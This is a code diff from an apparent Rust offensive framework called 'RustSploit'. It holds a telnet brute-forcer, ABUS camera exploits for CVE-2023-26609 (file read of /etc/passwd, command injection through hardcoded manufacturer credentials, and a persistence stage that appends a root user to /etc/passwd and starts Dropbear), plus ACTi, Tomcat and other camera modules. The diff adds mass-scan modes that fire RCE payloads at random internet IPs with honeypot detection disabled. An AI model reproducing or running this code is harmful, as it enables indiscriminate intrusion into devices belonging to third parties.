// Simple Read with Timeout
let read_future = reader.read(&mut buf);
let n = match timeout(Duration::from_millis(1500), read_future).await {
Ok(Ok(0)) => return Ok((false, banner_detected)), // EOF
Ok(Ok(n)) => n,
Ok(Err(_)) => return Ok((false, banner_detected)), // Error
Err(_) => {
// Read Timeout logic
// If waiting for banner and timed out -> No Banner Detected
if state == TelnetState::WaitingForBanner {
// Decide action based on mode
if force_password_only {
state = TelnetState::SendingPassword;
} else {
state = TelnetState::SendingUsername;
}
continue;
}
if state == TelnetState::WaitingForResult || state == TelnetState::WaitingForHelpResponse {
// Timeout waiting for result/help usually means fail or stuck
return Ok((false, banner_detected));
}
continue;
}
};
// IAC Stripping (Minimal)
let s = String::from_utf8_lossy(&buf[..n]);
let lower = s.to_lowercase();
// Handle current state
match state {
TelnetState::WaitingForBanner => {
if lower.contains("pass") || lower.contains("word") {
banner_detected = true;
state = TelnetState::SendingPassword;
} else if lower.contains("login") || lower.contains("user") || lower.contains("name") {
banner_detected = true;
state = TelnetState::SendingUsername;
}
}
TelnetState::SendingUsername => {
// Should not happen here if we just transitioned,
// but if we are reading response after sending user:
if lower.contains("pass") || lower.contains("word") {
state = TelnetState::SendingPassword;
}
}
TelnetState::WaitingForPasswordPrompt => {
if lower.contains("pass") || lower.contains("word") {
state = TelnetState::SendingPassword;
}
}
TelnetState::WaitingForResult => {
if lower.contains("incorrect") || lower.contains("fail") || lower.contains("denied") || lower.contains("error") {
return Ok((false, banner_detected));
}
if lower.contains("#") || lower.contains("$") || (lower.contains(">") && !lower.contains(">>")) || lower.contains("welcome") {
state = TelnetState::SendingHelp;
}
}
TelnetState::WaitingForHelpResponse => {
let mut match_count = 0;
for kw in HELP_KEYWORDS {
if lower.contains(kw) {
match_count += 1;
}
}
if match_count >= 2 {
return Ok((true, banner_detected));
}
}
_ => {}
}
// Perform Writes if needed
match state {
TelnetState::SendingUsername => {
let _ = writer.write_all(format!("{}\r\n", username).as_bytes()).await;
// Add requested 2s delay
tokio::time::sleep(Duration::from_secs(2)).await;
state = TelnetState::WaitingForPasswordPrompt;
}
TelnetState::SendingPassword => {
let _ = writer.write_all(format!("{}\r\n", password).as_bytes()).await;
state = TelnetState::WaitingForResult;
}
TelnetState::SendingHelp => {
let _ = writer.write_all(b"help\r\n").await;
state = TelnetState::WaitingForHelpResponse;
}
_ => {}
}
}
Ok((false, banner_detected))
}
+1
View File
@@ -1,2 +1,3 @@
pub mod generic; // <-- lowercase folder name
pub mod camera;
pub mod utils;
+203
View File
@@ -0,0 +1,203 @@
use std::sync::atomic::{AtomicU64, Ordering};
use std::time::Instant;
use colored::*;
use tokio::sync::Mutex;
use std::collections::HashMap;
use std::net::{IpAddr, Ipv4Addr};
use rand::Rng;
use tokio::fs::OpenOptions;
use tokio::io::AsyncWriteExt;
use tokio::process::Command;
/// Standard statistics tracking for bruteforce modules
pub struct BruteforceStats {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
retried_attempts: AtomicU64,
start_time: Instant,
unique_errors: Mutex<HashMap<String, usize>>,
}
impl BruteforceStats {
pub fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
retried_attempts: AtomicU64::new(0),
start_time: Instant::now(),
unique_errors: Mutex::new(HashMap::new()),
}
}
pub fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
}
}
pub fn record_success(&self) {
self.record_attempt(true, false);
}
pub fn record_failure(&self) {
self.record_attempt(false, false);
}
pub fn record_retry(&self) {
self.retried_attempts.fetch_add(1, Ordering::Relaxed);
}
pub async fn record_error_detail(&self, msg: String) {
let mut guard = self.unique_errors.lock().await;
*guard.entry(msg).or_insert(0) += 1;
}
pub async fn record_error(&self, msg: String) {
// Increment error counter
self.record_attempt(false, true);
// Record detail
self.record_error_detail(msg).await;
}
pub fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let retries = self.retried_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {} retry | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
retries,
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
pub async fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let retries = self.retried_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Successful: {}", success.to_string().green().bold());
println!(" Failed: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Retries: {}", retries);
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
}
let errors_guard = self.unique_errors.lock().await;
if !errors_guard.is_empty() {
println!("\n{}", "Top Errors:".bold());
let mut sorted_errors: Vec<_> = errors_guard.iter().collect();
sorted_errors.sort_by(|a, b| b.1.cmp(a.1));
for (msg, count) in sorted_errors.into_iter().take(5) {
println!(" - {}: {}", msg.yellow(), count);
}
}
}
}
pub fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
// Basic check first to avoid expensive loop
if octets[0] == 10 || octets[0] == 127 || octets[0] == 0 {
continue;
}
let mut excluded = false;
for net in exclusions {
if net.contains(ip_addr) {
excluded = true;
break;
}
}
if !excluded {
return ip_addr;
}
}
}
pub async fn is_ip_checked(ip: &impl ToString, state_file: &str) -> bool {
// Ensure state file exists before checking
if !std::path::Path::new(state_file).exists() {
if let Ok(mut file) = OpenOptions::new()
.create(true)
.write(true)
.open(state_file)
.await
{
let _ = file.flush().await;
}
return false;
}
let ip_s = ip.to_string();
let status = Command::new("grep")
.arg("-F")
.arg("-q")
.arg(format!("checked: {}", ip_s))
.arg(state_file)
.stderr(std::process::Stdio::null())
.status()
.await;
match status {
Ok(s) => s.success(),
Err(_) => false,
}
}
pub async fn mark_ip_checked(ip: &impl ToString, state_file: &str) {
let data = format!("checked: {}\n", ip.to_string());
if let Ok(mut file) = OpenOptions::new()
.create(true)
.append(true)
.open(state_file)
.await
{
let _ = file.write_all(data.as_bytes()).await;
}
}
pub fn parse_exclusions(min_ranges: &[&str]) -> Vec<ipnetwork::IpNetwork> {
let mut exclusion_subnets = Vec::new();
for cidr in min_ranges {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusion_subnets.push(net);
}
}
exclusion_subnets
}
@@ -6,26 +6,59 @@
use anyhow::{anyhow, Result, Context};
use colored::*;
use md5;
use rand::Rng;
use reqwest::Client;
use std::net::{IpAddr, Ipv4Addr};
use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use std::time::Duration;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::io::{self, Write};
use tokio::io::AsyncWriteExt;
use tokio::sync::Semaphore;
use tokio::sync::mpsc;
use tokio::fs::OpenOptions;
use chrono::Local;
use crate::utils::normalize_target;
const DEFAULT_TIMEOUT_SECS: u64 = 10;
const MASS_SCAN_CONCURRENCY: usize = 100;
const MASS_SCAN_PORT: u16 = 80;
/// Wraps/bracket-sanitizes IPv6 addresses (and leaves IPv4/hostnames alone)
fn format_host(raw: &str) -> String {
if raw.contains(':') {
// strip any number of existing brackets, then wrap once
let stripped = raw.trim_matches(|c| c == '[' || c == ']');
format!("[{}]", stripped)
} else {
raw.to_string()
// Bogon/Private/Reserved exclusion ranges
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32", "8.8.8.8/32", "8.8.4.4/32",
];
#[derive(Clone, Copy, Debug)]
enum ScanMode {
StandardCheck,
CustomCommand,
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
if !exclusions.iter().any(|net| net.contains(ip_addr)) {
return ip_addr;
}
}
}
/// Send authenticated LFI request
async fn exploit_lfi(client: &Client, target: &str, filepath: &str) -> Result<()> {
let host = format_host(target);
let host = normalize_target(target)?;
let url = format!(
"http://admin:admin@{}/cgi-bin/admin/fileread?READ.filePath={}",
host, filepath
@@ -49,7 +82,7 @@ async fn exploit_lfi(client: &Client, target: &str, filepath: &str) -> Result<()
/// Send authenticated RCE request with command injection
async fn exploit_rce(client: &Client, target: &str, cmd: &str) -> Result<()> {
let host = format_host(target);
let host = normalize_target(target)?;
let url = format!(
"http://manufacture:erutcafunam@{}/cgi-bin/mft/wireless_mft?ap=testname;{}",
host, cmd
@@ -125,6 +158,7 @@ fn display_banner() {
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
/// Prompt user for mode, and dispatch accordingly
/// Prompt user for mode, and dispatch accordingly
async fn execute(target: &str) -> Result<()> {
let client = Client::builder()
@@ -140,55 +174,31 @@ async fn execute(target: &str) -> Result<()> {
println!(" {} RCE (Remote Code Execution)", "[2]".green());
println!(" {} SSH Persistence (Full Compromise)", "[3]".green());
print!("{}", "> ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
io::stdout().flush().context("Failed to flush stdout")?;
let mut choice = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut choice)
.await
.context("Failed to read choice")?;
io::stdin().read_line(&mut choice).context("Failed to read choice")?;
match choice.trim() {
"1" => {
print!("{}", "Enter file path to read (e.g. /etc/passwd): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
io::stdout().flush().context("Failed to flush stdout")?;
let mut fp = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut fp)
.await
.context("Failed to read file path")?;
io::stdin().read_line(&mut fp).context("Failed to read file path")?;
exploit_lfi(&client, target, fp.trim()).await?;
}
"2" => {
print!("{}", "Enter command to execute (e.g. id): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
io::stdout().flush().context("Failed to flush stdout")?;
let mut cmd = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut cmd)
.await
.context("Failed to read command")?;
io::stdin().read_line(&mut cmd).context("Failed to read command")?;
exploit_rce(&client, target, cmd.trim()).await?;
}
"3" => {
// Ask for the desired password, hash it, and persist
print!("{}", "Enter desired password for new root user: ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
io::stdout().flush().context("Failed to flush stdout")?;
let mut pwd = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut pwd)
.await
.context("Failed to read password")?;
io::stdin().read_line(&mut pwd).context("Failed to read password")?;
let pwd = pwd.trim();
if pwd.is_empty() {
return Err(anyhow!("Password cannot be empty"));
@@ -204,7 +214,151 @@ async fn execute(target: &str) -> Result<()> {
Ok(())
}
/// Quick vulnerability check for mass scanning (no honeypot detection)
async fn quick_check(client: &Client, ip: &str, mode: ScanMode, custom_cmd: &str) -> bool {
let host = format!("{}:{}", ip, MASS_SCAN_PORT);
let cmd = if let ScanMode::CustomCommand = mode { custom_cmd } else { "id" };
let url = format!(
"http://manufacture:erutcafunam@{}/cgi-bin/mft/wireless_mft?ap=testname;{}",
host, cmd
);
match tokio::time::timeout(
Duration::from_secs(5),
client.get(&url).send()
).await {
Ok(Ok(resp)) => resp.status().is_success(),
_ => false,
}
}
/// Mass scan mode - infinite random IP scanning
async fn run_mass_scan() -> Result<()> {
display_banner();
println!("{}", "[*] Mass Scan Mode: 0.0.0.0/0".yellow().bold());
println!("{}", "[*] Honeypot detection: DISABLED".yellow());
println!("{}", format!("[*] Concurrency: {}", MASS_SCAN_CONCURRENCY).cyan());
// Prompt for exclusions (FIRST)
print!("{}", "[?] Exclude reserved/private ranges? [Y/n]: ".cyan());
io::stdout().flush()?;
let mut excl_choice = String::new();
io::stdin().read_line(&mut excl_choice)?;
let use_exclusions = !matches!(excl_choice.trim().to_lowercase().as_str(), "n" | "no");
let mut exclusions = Vec::new();
if use_exclusions {
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusions.push(net);
}
}
}
let exclusions = Arc::new(exclusions);
// Prompt for Output File
print!("{}", "[?] Output File (default: abus_hits.txt): ".cyan());
io::stdout().flush()?;
let mut outfile = String::new();
io::stdin().read_line(&mut outfile)?;
let outfile = outfile.trim();
let outfile = if outfile.is_empty() { "abus_hits.txt" } else { outfile };
let outfile = outfile.to_string();
// Prompt for Payload Mode
println!("{}", "[?] Select Payload Mode:".cyan());
println!(" 1. Standard Check (Command: id)");
println!(" 2. Custom Command");
print!("{}", "Select option [1-2] (default 1): ".cyan());
io::stdout().flush()?;
let mut mode_str = String::new();
io::stdin().read_line(&mut mode_str)?;
let mode = match mode_str.trim() {
"2" => ScanMode::CustomCommand,
_ => ScanMode::StandardCheck,
};
let mut custom_cmd = String::new();
if let ScanMode::CustomCommand = mode {
print!("{}", "[?] Enter Custom Command: ".cyan());
io::stdout().flush()?;
std::io::stdin().read_line(&mut custom_cmd)?;
custom_cmd = custom_cmd.trim().to_string();
}
let custom_cmd = Arc::new(custom_cmd);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
let client = Arc::new(client);
let semaphore = Arc::new(Semaphore::new(MASS_SCAN_CONCURRENCY));
let checked = Arc::new(AtomicUsize::new(0));
let found = Arc::new(AtomicUsize::new(0));
// Result writer channel
let (tx, mut rx) = mpsc::unbounded_channel::<String>();
let outfile_clone = outfile.clone();
tokio::spawn(async move {
let mut file = OpenOptions::new()
.create(true)
.append(true)
.open(&outfile_clone)
.await
.expect("Failed to open output file");
while let Some(result) = rx.recv().await {
let _ = file.write_all(result.as_bytes()).await;
}
});
// Stats reporter
let c = checked.clone();
let f = found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(10)).await;
println!("[*] Checked: {} | Found: {}", c.load(Ordering::Relaxed), f.load(Ordering::Relaxed));
}
});
loop {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let exc = exclusions.clone();
let cl = client.clone();
let chk = checked.clone();
let fnd = found.clone();
let tx = tx.clone();
let cc = custom_cmd.clone();
let current_mode = mode;
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
let ip_str = ip.to_string();
if quick_check(&cl, &ip_str, current_mode, &cc).await {
println!("{}", format!("[+] VULNERABLE: {}", ip_str).green().bold());
fnd.fetch_add(1, Ordering::Relaxed);
let timestamp = Local::now().format("%Y-%m-%d %H:%M:%S").to_string();
let log_entry = format!("{} - {}\n", ip_str, timestamp);
let _ = tx.send(log_entry);
}
chk.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
}
/// Entry point for the RustSploit dispatch system
pub async fn run(target: &str) -> Result<()> {
execute(target).await
}
if target == "0.0.0.0" || target == "0.0.0.0/0" || target.is_empty() || target == "random" {
run_mass_scan().await
} else {
execute(target).await
}
}
@@ -1,151 +0,0 @@
// Exploit Title: ABUS Security Camera TVIP 20000-21150 - SSH Root Persistence
// CVE: CVE-2023-26609
// Variant 2 - Dropbear SSH Persistence with custom username
use anyhow::{Result, Context};
use colored::*;
use crate::utils::normalize_target;
use md5;
use reqwest::Client;
use std::time::Duration;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
const DEFAULT_TIMEOUT_SECS: u64 = 10;
// Use framework's normalize_target utility - removed custom implementation
/// Send a command using the vulnerable RCE endpoint
async fn exploit_rce(client: &Client, target: &str, cmd: &str) -> Result<()> {
let normalized = normalize_target(target)?;
let url = format!(
"http://manufacture:erutcafunam@{}/cgi-bin/mft/wireless_mft?ap=inject;{}",
normalized, cmd
);
println!("{}", format!("[*] Sending RCE payload: {}", cmd).cyan());
let resp = client.get(&url).send().await?;
let status = resp.status();
let body = resp.text().await?;
if status.is_success() {
println!("{}", format!("[+] Status: {}", status).green());
println!("{}", "[+] Response:".green());
println!("{}", body);
} else {
println!("{}", format!("[-] Status: {}", status).red());
println!("{}", format!("[-] Response:\n{}", body).red());
}
Ok(())
}
/// Generate Dropbear SSH keys on the target system
async fn generate_ssh_key(client: &Client, target: &str) -> Result<()> {
let cmd = "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key";
println!("{}", "[*] Stage 1: Generating Dropbear SSH key...".yellow());
exploit_rce(client, target, cmd).await
}
/// Inject a root user with a hashed password into /etc/passwd
async fn inject_root_user(client: &Client, target: &str, user: &str, hash: &str) -> Result<()> {
let payload = format!(
"echo%20{}:{}:0:0:root:/:/bin/sh%20>>%20/etc/passwd",
user, hash
);
println!("{}", format!("[*] Stage 2: Injecting user '{}' with root privileges...", user).yellow());
exploit_rce(client, target, &payload).await
}
/// Start Dropbear SSH daemon
async fn start_dropbear(client: &Client, target: &str) -> Result<()> {
let cmd = "/etc/dropbear/dropbear%20-E%20-F";
println!("{}", "[*] Stage 3: Starting Dropbear SSH daemon...".yellow());
exploit_rce(client, target, cmd).await
}
/// Generate an MD5 hash of the given password
fn generate_md5_hash(password: &str) -> String {
let digest = md5::compute(password.as_bytes());
format!("{:x}", digest)
}
/// Display module banner
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ ABUS Security Camera TVIP 20000-21150 Exploit ║".cyan());
println!("{}", "║ CVE-2023-26609 - Dropbear SSH Persistence ║".cyan());
println!("{}", "║ Variant 2 - Custom Username SSH Root Access ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
/// Main interactive flow: get user/pass, hash it, and inject persistence
async fn execute_flow(target: &str) -> Result<()> {
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
print!("{}", "Enter username to inject: ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut user = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut user)
.await
.context("Failed to read username")?;
let user = user.trim();
if user.is_empty() {
println!("{}", "[-] Username cannot be empty".red());
return Err(anyhow::anyhow!("Username cannot be empty"));
}
print!("{}", "Enter password (will be hashed): ".cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut pass = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut pass)
.await
.context("Failed to read password")?;
let pass = pass.trim();
if pass.is_empty() {
println!("{}", "[-] Password cannot be empty".red());
return Err(anyhow::anyhow!("Password cannot be empty"));
}
// Hash it!
let hash = generate_md5_hash(pass);
println!("{}", format!("[*] Generated MD5 hash: {}", hash).cyan());
println!();
// Run each step
generate_ssh_key(&client, target).await?;
inject_root_user(&client, target, user, &hash).await?;
start_dropbear(&client, target).await?;
println!();
println!("{}", "[+] Persistence complete! You can now SSH in with:".green().bold());
println!(
"{}",
format!(
" sshpass -p '{}' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \\\n -oHostKeyAlgorithms=+ssh-rsa {}@{}",
pass, user, target
).cyan()
);
Ok(())
}
/// Dispatcher entry-point for the auto-dispatch framework
pub async fn run(target: &str) -> Result<()> {
execute_flow(target).await
}
+1 -1
View File
@@ -1,2 +1,2 @@
pub mod abussecurity_camera_cve202326609variant1;
pub mod abussecurity_camera_cve202326609variant2;
+9 -11
View File
@@ -1,8 +1,9 @@
use anyhow::{anyhow, Result, Context};
use colored::*;
use std::io::Write;
use reqwest::Client;
use std::time::Duration;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
/// Executes an RCE on ACTi ACM-5611 Video Camera using command injection
/// Reference:
@@ -31,14 +32,12 @@ pub async fn run(target: &str) -> Result<()> {
// Prompt for port
print!("{}", format!("Enter target port (default {}): ", DEFAULT_PORT).cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut port_input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut port_input)
.await
.context("Failed to read port input")?;
let port: u16 = port_input.trim().parse().unwrap_or(DEFAULT_PORT);
@@ -49,14 +48,12 @@ pub async fn run(target: &str) -> Result<()> {
// Prompt for command to execute
print!("{}", "Enter command to execute (default: id): ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut cmd_input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut cmd_input)
.await
.context("Failed to read command input")?;
let cmd = {
let t = cmd_input.trim();
@@ -81,11 +78,12 @@ async fn execute(target: &str, port: u16, cmd: &str) -> Result<String> {
.danger_accept_invalid_certs(true)
.build()?;
let url = reqwest::Url::parse_with_params(&url, &[("iperf", format!(";{}", cmd))])?;
let res = client
.get(&url)
.get(url)
.header("Content-Type", "application/x-www-form-urlencoded")
.header("Referer", format!("http://{}:{}", target, port))
.query(&[("iperf", format!(";{}", cmd))])
.send()
.await?;
@@ -6,7 +6,7 @@ use std::net::{TcpStream, ToSocketAddrs};
use std::time::Duration;
use tokio::time::sleep;
use rand::prelude::IndexedRandom;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::io::Write;
/// TomcatKiller - CVE-2025-31650
/// Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers
@@ -16,7 +16,7 @@ pub async fn run(target: &str) -> Result<()> {
println!("Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.");
println!("{}", "Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.".yellow());
let port = prompt_for_port().await.unwrap_or(443);
let port = prompt_for_port().unwrap_or(443);
let normalized = if target.starts_with("http://") || target.starts_with("https://") {
target.to_string()
} else {
@@ -67,17 +67,15 @@ pub async fn run(target: &str) -> Result<()> {
Ok(())
}
async fn prompt_for_port() -> Option<u16> {
fn prompt_for_port() -> Option<u16> {
print!("{}", "Enter target port (default 443): ".cyan());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.ok()?;
let mut buffer = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut buffer)
.await
.ok()?;
let trimmed = buffer.trim();
@@ -5,8 +5,8 @@ use reqwest::{Client, StatusCode};
use std::path::Path;
use std::process::{Command, Stdio};
use std::time::Duration;
use std::io::Write;
use tokio::fs::{read, remove_file};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
const BANNER: &str = r#"
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗
@@ -30,14 +30,12 @@ fn sanitize_target(raw: &str) -> String {
/// Prompt helper with proper error handling
async fn prompt(message: &str, default: Option<&str>) -> Result<String> {
print!("{}{}: ", message, default.map_or("".to_string(), |d| format!(" [{}]", d)));
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut buf = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut buf)
.await
.context("Failed to read user input")?;
let input = buf.trim();
if input.is_empty() {
@@ -1,12 +1,45 @@
use anyhow::{Result, Context};
use colored::*;
use rand::Rng;
use reqwest::Client;
use std::net::{IpAddr, Ipv4Addr};
use std::path::Path;
use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use std::time::Duration;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::io::{Write, BufRead};
use tokio::sync::Semaphore;
use crate::utils::escape_shell_command;
const DEFAULT_PORT: &str = "80";
const DEFAULT_TIMEOUT_SECS: u64 = 10;
const MASS_SCAN_CONCURRENCY: usize = 100;
const MASS_SCAN_PORT: u16 = 80;
// Bogon/Private/Reserved exclusion ranges
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32", "8.8.8.8/32", "8.8.4.4/32",
];
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
if !exclusions.iter().any(|net| net.contains(ip_addr)) {
return ip_addr;
}
}
}
/// Display module banner
fn display_banner() {
@@ -49,17 +82,16 @@ async fn check_vuln(client: &Client, base: &str) -> Result<bool> {
/// Interactive shell to send arbitrary commands
async fn interactive_shell(client: &Client, base: &str) -> Result<()> {
let stdin = tokio::io::stdin();
let mut lines = tokio::io::BufReader::new(stdin).lines();
let stdin = std::io::stdin();
let mut lines = stdin.lock().lines();
println!("{}", "[+] Interactive shell started. Type 'exit' to quit.".green().bold());
loop {
print!("{}", "cve7029-shell> ".cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
if let Some(cmd) = lines.next_line().await? {
if let Some(Ok(cmd)) = lines.next() {
let cmd = cmd.trim();
if cmd.eq_ignore_ascii_case("exit") {
println!("{}", "[*] Exiting shell...".yellow());
@@ -81,8 +113,6 @@ async fn interactive_shell(client: &Client, base: &str) -> Result<()> {
/// // Execute a remote command by abusing the brightness parameter
async fn exec_cmd(client: &Client, base: &str, cmd: &str) -> Result<String> {
use crate::utils::escape_shell_command;
let mut url = reqwest::Url::parse(base)?;
url.set_path("/cgi-bin/supervisor/Factory.cgi");
// Escape command to prevent injection of additional shell commands
@@ -96,62 +126,150 @@ async fn exec_cmd(client: &Client, base: &str, cmd: &str) -> Result<String> {
}
/// Prompt user for a custom port number
async fn prompt_port() -> Result<String> {
fn prompt_port() -> Result<String> {
print!("{}", format!("Enter port to use [default: {}]: ", DEFAULT_PORT).cyan().bold());
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut port = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut port)
.await
.context("Failed to read port")?;
let port = port.trim();
Ok(if port.is_empty() { DEFAULT_PORT.to_string() } else { port.to_string() })
}
/// Entry point required for RouterSploit-inspired dispatch system
pub async fn run(target: &str) -> Result<()> {
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
/// Quick vulnerability check for mass scanning
async fn quick_check(client: &Client, ip: &str) -> bool {
let host = format!("{}:{}", ip, MASS_SCAN_PORT);
let url = format!("http://{}/cgi-bin/supervisor/Factory.cgi?action=Set&brightness=1;echo_CVE7029;", host);
match tokio::time::timeout(
Duration::from_secs(5),
client.get(&url).send()
).await {
Ok(Ok(resp)) => {
if let Ok(body) = resp.text().await {
body.contains("echo_CVE7029")
} else {
false
}
},
_ => false,
}
}
let port = prompt_port().await?;
/// Mass scan mode
async fn run_mass_scan() -> Result<()> {
display_banner();
println!("{}", "[*] Mass Scan Mode: 0.0.0.0/0".yellow().bold());
println!("{}", "[*] Honeypot detection: DISABLED".yellow());
println!("{}", format!("[*] Concurrency: {}", MASS_SCAN_CONCURRENCY).cyan());
// Prompt for exclusions
print!("{}", "[?] Exclude reserved/private ranges? [Y/n]: ".cyan());
std::io::stdout().flush()?;
let mut excl_choice = String::new();
std::io::stdin().read_line(&mut excl_choice)?;
let use_exclusions = !matches!(excl_choice.trim().to_lowercase().as_str(), "n" | "no");
let mut exclusions = Vec::new();
if use_exclusions {
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusions.push(net);
}
}
}
let exclusions = Arc::new(exclusions);
let client = Client::builder()
.danger_accept_invalid_certs(true)
